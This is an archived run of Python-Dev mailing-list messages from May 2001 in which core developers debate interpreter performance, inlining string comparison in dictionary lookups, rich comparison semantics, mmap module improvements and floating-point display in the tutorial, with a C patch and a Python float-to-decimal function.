In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal at lemburg.com  Sun May 20 13:50:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. truning the VM a register machine 
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Sun May 20 13:52:40 2001
From: mwh at python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one at home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one at home.com  Sun May 20 14:57:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. truning the VM a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one at home.com  Sun May 20 14:58:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one at home.com  Sun May 20 15:09:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctinoCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and whether their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz at rahul.net  Sun May 20 15:50:08 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to tbe rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin at loewis.home.cs.tu-berlin.de  Sun May 20 15:48:43 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.

Regards,
Martin


From guido at digicool.com  Sun May 20 15:56:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
             <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to tbe rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3r party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sun May 20 18:19:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it regardeless whether they
are function call intense or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. truning the VM a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sun May 20 23:13:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
self-contained-- apart from memcmp() --string_richcompare).


From tim.one at home.com  Sun May 20 23:37:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3r party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.


From tim.one at home.com  Mon May 21 09:53:24 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below didn't cover the case where cmp() is requested and is defined.
I believe it's agreed now (but wasn't yet at the time you wrote this) that
cmp() will be called in that case (and which requires changes to the current
implementation).

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was intended detail, like that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know to explain why each method gets called twice (well, I do, but
it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and unclear whether this is intended,
a bug, or implementation-defined.

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett at stsci.edu  Mon May 21 14:17:09 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return      > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux     > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4      > bytes).  The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform     > capabilities out of reach for large files (e.g., "even Win95" *allows*       > specifying 64-bit offsets when creating a mapped file view).  C is a         > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()     > don't cater to the full range of C integral types anyway.  In other words,  > if this code is ever to reach its full potential, it "really needs to be     > rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the     > OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops         > working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 18:44:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 19:03:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.

This is now also in the string_richcompare patch on SF.

Regards,
Martin


From tim.one at home.com  Mon May 21 20:29:02 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly apprectiated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)


From guido at digicool.com  Mon May 21 21:02:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
             <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

